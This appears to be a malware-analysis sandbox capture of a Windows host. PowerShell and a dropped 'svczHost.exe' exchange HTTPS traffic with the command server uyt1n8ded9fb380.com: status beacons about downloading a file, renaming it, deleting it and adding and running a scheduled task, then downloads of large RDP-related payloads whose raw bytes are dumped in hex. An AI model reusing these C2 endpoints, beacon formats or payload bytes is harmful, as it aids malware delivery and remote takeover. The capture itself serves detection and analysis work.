                                                                                      2024-11-08 09:46:15 UTC1369INData Raw: 8a 01 49 8c 0c ec be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 b3 25 01 49 8c 04 76 4a 90 01 49 8a 01 49 8c 0c e4 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 b3 25 01 49 8c 04 5e 4a 90 01 49 8a 01 49 8c 0c cc be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b3 25 01 49 8c 04 46 4a 90 01 49 8a 01 49 8c 0c b4 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 b0 25 01 49 8c 04 2e 4a 90 01 49 8a 01 49 8c 0c 9c be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 b0 25 01 49 8c 04 1e 4a 90 01 49 8a 01 49 8c 0c 84 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 b0 25 01 49 8c 04 06 4a 90 01 49 8a 01 49 8c 0c 94 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 b0 25 01 49 8c 04 ee 4b 90 01 49 8a 01 49 8c 0c 7c be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 b0 25 01 49 8c 04 fe 4b 90 01
                                                                                      Data Ascii: IOI8tIG%IvJIIOI8tI'%I^JIIOI8tI%IFJIIOI8tI%I.JIIOI8tI%IJIIOI8tI%IJIIOI8tI%IKII|OI8tIg%IK


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      14192.168.11.3049772172.67.137.624438756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-08 09:46:26 UTC290OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180700aa1792d8a220789936151247e2f1 HTTP/1.1
                                                                                      Content-Type: application/json
                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                      Host: uyt1n8ded9fb380.com
                                                                                      Content-Length: 200
                                                                                      2024-11-08 09:46:26 UTC200OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 63 6f 6d 70 6c 65 74 65 64 3a 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 54 68 65 20 66 69 6c 65 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 20 77 61 73 20 70 72 6f 63 65 73 73 65 64 20 61 6e 64 20 73 61 76 65 64 20 61 73 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 73 76 63 7a 48 6f 73 74 2e 65 78 65 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                      Data Ascii: [ "\"Download completed: C:\\\\Windows\\\\Temp\\\\file\"", "\"The file C:\\\\Windows\\\\Temp\\\\file was processed and saved as C:\\\\Windows\\\\Temp\\\\svczHost.exe\"", "----------"]
                                                                                      2024-11-08 09:46:27 UTC943INHTTP/1.1 200 OK
                                                                                      Date: Fri, 08 Nov 2024 09:46:27 GMT
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ngwkiOeeAxyfKrGBckcR77yPr%2Bj05ufvU0zq3X1dnT0y1JrHx00zPcCfZ2Zl0qYdk3Kac9d8ZsNfQH8KtRCikBP3qSwD3R0IGlqtNtlpikdFOIOBnEKZE4viMSYZpj312FkfMYs%2FOVmM"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=9230&sent=41780&recv=21266&lost=0&retrans=0&sent_bytes=58393278&recv_bytes=182442&delivery_rate=13463114&cwnd=258&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      X-Powered-By: ARR/3.0
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8df4a2ce0bee432b-EWR
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=107635&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1150&delivery_rate=36665&cwnd=252&unsent_bytes=0&cid=265bf3edd97b462a&ts=853&x=0"


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      15192.168.11.3049773172.67.137.624438756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-08 09:46:27 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180700aa1792d8a220789936151247e2f1 HTTP/1.1
                                                                                      Content-Type: application/json
                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                      Host: uyt1n8ded9fb380.com
                                                                                      Content-Length: 97
                                                                                      2024-11-08 09:46:27 UTC97OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 44 65 74 65 6c 65 20 46 69 6c 65 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 61 64 64 20 74 61 73 6b 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                      Data Ascii: [ "\"Detele File C:\\\\Windows\\\\Temp\\\\file\"", "\"add task\"", "----------"]
                                                                                      2024-11-08 09:46:28 UTC953INHTTP/1.1 200 OK
                                                                                      Date: Fri, 08 Nov 2024 09:46:28 GMT
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3W7iDHt9FMli%2FUnFrvROv%2F31WId%2B0lTWsl75vcWQa9%2BfbE7vbaT9qABhUZ%2B9zBOFMimyDciPjzIhMInXNpji%2BWrDQES6iC2HVcIU3BVCj5j4TDUZ%2Bw%2Bn70zopqN9CDqLaBSDn%2Bg5nkls"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=10136&sent=6199&recv=3091&lost=0&retrans=0&sent_bytes=8755706&recv_bytes=5344&delivery_rate=60525316&cwnd=300&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      X-Powered-By: ARR/3.0
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8df4a2d4de5d0dc7-EWR
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=102469&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1046&delivery_rate=37322&cwnd=249&unsent_bytes=0&cid=cf86c7c5a8bdc457&ts=837&x=0"


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      16192.168.11.3049775172.67.137.624438756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-08 09:46:31 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180700aa1792d8a220789936151247e2f1 HTTP/1.1
                                                                                      Content-Type: application/json
                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                      Host: uyt1n8ded9fb380.com
                                                                                      Content-Length: 64
                                                                                      2024-11-08 09:46:31 UTC64OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 72 75 6e 20 74 61 73 6b 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 6b 65 74 20 74 68 75 63 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                      Data Ascii: [ "\"run task\"", "\"ket thuc\"", "----------"]
                                                                                      2024-11-08 09:46:32 UTC943INHTTP/1.1 200 OK
                                                                                      Date: Fri, 08 Nov 2024 09:46:32 GMT
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k9c%2FvHUhFFuZaBMqXDHqGPz5W58fnoiNNEr4A4yp91z5h0yFHHFAELmcgNNrqaKYQsRGkPLQu3bf5qTFnOE1pdhU%2FUw2C6JyG%2Fvaw8FyqFdzTMy26pN9L3i5qNGChpnGMepPEWOsWDeH"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2013&sent=11546&recv=5667&lost=0&retrans=24&sent_bytes=16274473&recv_bytes=7246&delivery_rate=56299592&cwnd=300&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      X-Powered-By: ARR/3.0
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8df4a2ee5d20422d-EWR
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=102347&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1013&delivery_rate=37438&cwnd=252&unsent_bytes=0&cid=b3136e6ca02b0686&ts=818&x=0"


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      17192.168.11.3049777172.67.137.624437664C:\Windows\Temp\svczHost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-08 09:47:19 UTC69OUTGET /StaticFile/RdpService/12 HTTP/1.1
                                                                                      Host: uyt1n8ded9fb380.com
                                                                                      2024-11-08 09:47:19 UTC1096INHTTP/1.1 200 OK
                                                                                      Date: Fri, 08 Nov 2024 09:47:19 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 9427456
                                                                                      Connection: close
                                                                                      content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                      hash: F651568CD1F1A7ABAEDD4389DA3A2F14
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5tBPXsd6x8IK0KKDvqjTqSVGHEd2Mweil1HuBxycs4k76pMaPHVzVDE5O5sdNWzMu0Z9CofBol%2Fj4PtVBHKdQ9fMq0wgBMUy1OCZRDhQOgdEhNpmNQdoGeO7ka0rpUpJwyj%2BRE0SFJOQ"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1756&sent=4541&recv=2188&lost=0&retrans=0&sent_bytes=6409269&recv_bytes=3348&delivery_rate=59845320&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      X-Powered-By: ARR/3.0
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8df4a4150c4f7286-EWR
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=102440&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=707&delivery_rate=37349&cwnd=246&unsent_bytes=0&cid=7689787be803245d&ts=849&x=0"
                                                                                      2024-11-08 09:47:19 UTC273INData Raw: 41 56 9c 0c 0f 0c 0c 0c 08 0c 0c 0c f3 f3 0c 0c b4 0c 0c 0c 0c 0c 0c 0c 4c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0d 0c 0c 02 13 b6 02 0c b8 05 c1 2d b4 0d 40 c1 2d 58 64 65 7f 2c 7c 7e 63 6b 7e 6d 61 2c 6f 6d 62 62 63 78 2c 6e 69 2c 7e 79 62 2c 65 62 2c 48 43 5f 2c 61 63 68 69 22 01 01 06 28 0c 0c 0c 0c 0c 0c 0c e2 e1 3a 2c a6 80 54 7f a6 80 54 7f a6 80 54 7f af f8 c7 7f a8 80 54 7f d6 01 55 7e b1 80 54 7f a6 80 55 7f 20 81 54 7f b6 04 57 7e b5 80 54 7f b6 04 50 7e 9f 80 54 7f ee 05 51 7e a5 80 54 7f d6 01 50 7e a4 80 54 7f a6 80 54 7f a7 80 54 7f b6 04 51 7e d0 80 54 7f ee 05 54 7e a7 80 54 7f ee 05 56 7e a7 80 54 7f 5e 65 6f 64 a6 80 54 7f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                                                                      Data Ascii: AVL-@-Xde,|~ck~ma,ombbcx,ni,~yb,eb,HC_,achi"(:,TTTTU~TU TW~TP~TQ~TP~TTTQ~TT~TV~T^eodT
                                                                                      2024-11-08 09:47:19 UTC1369INData Raw: 0c 0c 0c fc 0c 2e 0c 07 0e 02 25 0c 36 5c 0c 0c 9c 4d 0c 0c 16 10 0c 94 dd 07 0c 0c 1c 0c 0c 0c 0c 0c 4c 0d 0c 0c 0c 0c 1c 0c 0c 0c 0e 0c 0c 0a 0c 0c 0c 0c 0c 0c 0c 0a 0c 0c 0c 0c 0c 0c 0c 0c 4c a2 0c 0c 08 0c 0c 0c 0c 0c 0c 0f 0c 6c 8d 0c 0c 1c 0c 0c 0c 0c 0c 0c 1c 0c 0c 0c 0c 0c 0c 0c 0c 1c 0c 0c 0c 0c 0c 0c 1c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 1c 0c 0c 0c 0c ca a9 0c 04 0e 0c 0c 04 c4 a9 0c 70 0d 0c 0c 0c 1c a2 0c be 09 0c 0c 0c 8c a4 0c c4 8a 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 2c a2 0c 40 18 0c 0c 9c a0 95 0c 10 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 8c a2 95 0c 24 0c 0c 0c 5c a7 95 0c 4c 0d 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 8c 60 0c cc 07 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 22 78 69 74 78 0c 0c 0c
                                                                                      Data Ascii: .%6\MLLlp,@$\L`"xitx
                                                                                      2024-11-08 09:47:19 UTC1369INData Raw: 01 ed 82 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 ce d8 24 0c 44 81 09 47 83 54 0c 44 81 01 30 83 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 a9 d8 24 0c 44 81 09 32 83 54 0c 44 81 01 23 83 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 84 d8 24 0c 44 81 09 3d 83 54 0c 44 81 01 2e 83 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 67 d8 24 0c 44 81 09 28 83 54 0c 44 81 01 19 83 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 42 d8 24 0c 44 81 09 1b 83 54 0c 44 81 01 04 83 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 3d d8 24 0c 44 81 09 06 83 54 0c 44 81 01 f7 82 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 18 d8 24 0c 44 81 09 f1 82 54 0c 44 81 01 e2 82 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 fb df 24 0c 44 81 09 14 83 54 0c 44 81 01 05 83 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 d6 df 24 0c 44 81 09
                                                                                      Data Ascii: TD5yD$DGTD0TD5yD$D2TD#TD5yD$D=TD.TD5yDg$D(TDTD5yDB$DTDTD5yD=$DTDTD5yD$DTDTD5yD$DTDTD5yD$D
                                                                                      2024-11-08 09:47:19 UTC1369INData Raw: 8f 35 0c 79 0d cf 44 87 dc e5 63 c3 24 0c 44 81 09 94 9d 54 0c 44 81 01 85 9d 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 5e c3 24 0c 44 81 09 87 9d 54 0c 44 81 01 70 9d 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 39 c3 24 0c 44 81 09 72 9d 54 0c 44 81 01 63 9d 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 14 c3 24 0c 44 81 09 75 9d 54 0c 44 81 01 66 9d 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 f7 c2 24 0c 44 81 09 78 9d 54 0c 44 81 01 69 9d 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 d2 c2 24 0c 44 81 09 e3 9d 54 0c 44 81 01 ec 9d 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 cd c2 24 0c 44 81 09 e6 9d 54 0c 44 81 01 d7 9d 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 a8 c2 24 0c 44 81 09 e9 9d 54 0c 44 81 01 da 9d 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 8b c2 24 0c 44 81 09 24 9e 54 0c 44 81
                                                                                      Data Ascii: 5yDc$DTDTD5yD^$DTDpTD5yD9$DrTDcTD5yD$DuTDfTD5yD$DxTDiTD5yD$DTDTD5yD$DTDTD5yD$DTDTD5yD$D$TD
                                                                                      2024-11-08 09:47:19 UTC516INData Raw: 0c 44 87 0c 44 81 01 5d 8e 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 e6 c5 24 0c 44 81 09 57 03 aa 0c 44 87 0c 44 81 01 35 8e 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 c6 c5 24 0c 44 81 09 77 03 aa 0c 44 87 0c 44 81 01 35 8e 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 a6 c5 24 0c 44 81 09 6f 03 aa 0c 44 87 0c 44 81 01 2d 8e 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 86 c5 24 0c 44 81 09 47 03 aa 0c 44 87 0c 44 81 01 35 8e 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 66 c5 24 0c 44 81 09 4f 03 aa 0c 44 87 0c 44 81 01 5d 8e 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 46 c5 24 0c 44 81 09 27 03 aa 0c 44 87 0c 44 81 01 35 8e 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 26 c5 24 0c 44 81 09 17 03 aa 0c 44 87 0c 44 81 01 3d 8e 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 06 c5 24 0c 44 81 09 0f 03
                                                                                      Data Ascii: DD]TD5yD$DWDD5TD5yD$DwDD5TD5yD$DoDD-TD5yD$DGDD5TD5yDf$DODD]TD5yDF$D'DD5TD5yD&$DDD=TD5yD$D
                                                                                      2024-11-08 09:47:20 UTC1369INData Raw: 44 81 01 c5 8d 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 e6 cb 24 0c 44 81 09 7f 02 aa 0c 44 87 0c 44 81 01 cd 8d 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 c6 cb 24 0c 44 81 09 77 02 aa 0c 44 87 0c 44 81 01 cd 8d 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 a6 cb 24 0c 44 81 09 6f 02 aa 0c 44 87 0c 44 81 01 bd 8d 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 86 cb 24 0c 44 81 09 6f 02 aa 0c 44 87 0c 44 81 01 9d 8e 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 66 cb 24 0c 44 81 09 47 02 aa 0c 44 87 0c 44 81 01 75 8e 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 46 cb 24 0c 44 81 09 3f 02 aa 0c 44 87 0c 44 81 01 6d 8e 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 26 cb 24 0c 44 81 09 17 02 aa 0c 44 87 0c 44 81 01 45 8e 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 06 cb 24 0c 44 81 09 07 02 aa 0c 44 87
                                                                                      Data Ascii: DTD5yD$DDDTD5yD$DwDDTD5yD$DoDDTD5yD$DoDDTD5yDf$DGDDuTD5yDF$D?DDmTD5yD&$DDDETD5yD$DD
                                                                                      2024-11-08 09:47:20 UTC1369INData Raw: d7 07 aa 0c 44 87 0c 44 81 01 f5 73 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 86 ce 24 0c 44 81 09 c7 07 aa 0c 44 87 0c 44 81 01 ed 73 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 66 ce 24 0c 44 81 09 bf 07 aa 0c 44 87 0c 44 81 01 c5 73 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 46 ce 24 0c 44 81 09 97 07 aa 0c 44 87 0c 44 81 01 bd 73 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 26 ce 24 0c 44 81 09 8f 07 aa 0c 44 87 0c 44 81 01 95 73 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 06 ce 24 0c 44 81 09 67 07 aa 0c 44 87 0c 44 81 01 8d 73 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 e6 cd 24 0c 44 81 09 6f 07 aa 0c 44 87 0c 44 81 01 8d 73 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 c6 cd 24 0c 44 81 09 47 07 aa 0c 44 87 0c 44 81 01 65 73 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 a6 cd 24 0c 44 81
                                                                                      Data Ascii: DDsTD5yD$DDDsTD5yDf$DDDsTD5yDF$DDDsTD5yD&$DDDsTD5yD$DgDDsTD5yD$DoDDsTD5yD$DGDDesTD5yD$D
                                                                                      2024-11-08 09:47:20 UTC1369INData Raw: 46 b1 24 0c 44 81 09 27 05 aa 0c 44 87 0c 44 81 01 f5 71 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 26 b1 24 0c 44 81 09 2f 05 aa 0c 44 87 0c 44 81 01 0d 72 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 06 b1 24 0c 44 81 09 07 05 aa 0c 44 87 0c 44 81 01 05 72 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 e6 b0 24 0c 44 81 09 ff 04 aa 0c 44 87 0c 44 81 01 0d 72 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 c6 b0 24 0c 44 81 09 d7 04 aa 0c 44 87 0c 44 81 01 e5 71 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 a6 b0 24 0c 44 81 09 cf 04 aa 0c 44 87 0c 44 81 01 ed 71 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 86 b0 24 0c 44 81 09 bf 04 aa 0c 44 87 0c 44 81 01 c5 71 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 66 b0 24 0c 44 81 09 bf 04 aa 0c 44 87 0c 44 81 01 fd 71 54 0c 44 8f 35 0c 79 0d cf 44 87 dc
                                                                                      Data Ascii: F$D'DDqTD5yD&$D/DDrTD5yD$DDDrTD5yD$DDDrTD5yD$DDDqTD5yD$DDDqTD5yD$DDDqTD5yDf$DDDqTD5yD
                                                                                      2024-11-08 09:47:20 UTC1369INData Raw: 79 0d cf 44 87 dc e5 e6 bb 24 0c 44 81 09 2f 0a aa 0c 44 87 0c 44 81 01 2d 70 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 c6 bb 24 0c 44 81 09 2f 0a aa 0c 44 87 0c 44 81 01 1d 70 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 a6 bb 24 0c 44 81 09 1f 0a aa 0c 44 87 0c 44 81 01 f5 77 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 86 bb 24 0c 44 81 09 0f 0a aa 0c 44 87 0c 44 81 01 ed 77 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 66 bb 24 0c 44 81 09 0f 0a aa 0c 44 87 0c 44 81 01 d5 77 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 46 bb 24 0c 44 81 09 e7 09 aa 0c 44 87 0c 44 81 01 cd 77 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 26 bb 24 0c 44 81 09 df 09 aa 0c 44 87 0c 44 81 01 a5 77 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 06 bb 24 0c 44 81 09 c7 09 aa 0c 44 87 0c 44 81 01 ad 77 54 0c 44 8f 35
                                                                                      Data Ascii: yD$D/DD-pTD5yD$D/DDpTD5yD$DDDwTD5yD$DDDwTD5yDf$DDDwTD5yDF$DDDwTD5yD&$DDDwTD5yD$DDDwTD5
                                                                                      2024-11-08 09:47:20 UTC1369INData Raw: 74 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 86 be 24 0c 44 81 09 2f 09 aa 0c 44 87 0c 44 81 01 b5 74 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 66 be 24 0c 44 81 09 1f 09 aa 0c 44 87 0c 44 81 01 ad 74 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 46 be 24 0c 44 81 09 0f 09 aa 0c 44 87 0c 44 81 01 85 74 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 26 be 24 0c 44 81 09 e7 08 aa 0c 44 87 0c 44 81 01 7d 74 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 06 be 24 0c 44 81 09 df 08 aa 0c 44 87 0c 44 81 01 55 74 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 e6 bd 24 0c 44 81 09 b7 08 aa 0c 44 87 0c 44 81 01 4d 74 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 c6 bd 24 0c 44 81 09 af 08 aa 0c 44 87 0c 44 81 01 25 74 54 0c 44 8f 35 0c 79 0d cf 44 87 dc e5 a6 bd 24 0c 44 81 09 af 08 aa 0c 44 87 0c 44 81 01
                                                                                      Data Ascii: tTD5yD$D/DDtTD5yDf$DDDtTD5yDF$DDDtTD5yD&$DDD}tTD5yD$DDDUtTD5yD$DDDMtTD5yD$DDD%tTD5yD$DDD


                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                      18192.168.11.3049783172.67.137.62443
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-08 09:48:02 UTC76OUTGET /StaticFile/TermServiceTryRun/79 HTTP/1.1
                                                                                      Host: uyt1n8ded9fb380.com
                                                                                      2024-11-08 09:48:02 UTC1101INHTTP/1.1 200 OK
                                                                                      Date: Fri, 08 Nov 2024 09:48:02 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 2183168
                                                                                      Connection: close
                                                                                      content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                      hash: BFF2365257251B6BA227A5E748DBD62E
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Z0fsQGzo54M03pi3zEOPvSWgLM4v0sYMFruRGHEKR%2Bl0pjXhLGPJFEXrB4Cavqj83cGmSXlHhgWBHgE%2FctqCl4rgqBEdKziccnoMQy8qyAx7wxGbnk61P7x%2F37SSFrxtMoCTn8f6Jt7"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2951&sent=15713&recv=7637&lost=0&retrans=0&sent_bytes=22343247&recv_bytes=88867&delivery_rate=27947932&cwnd=268&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      X-Powered-By: ARR/3.0
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8df4a521daf8dda5-IAD
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=109537&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=714&delivery_rate=34961&cwnd=212&unsent_bytes=0&cid=1bf0d2225052c291&ts=853&x=0"
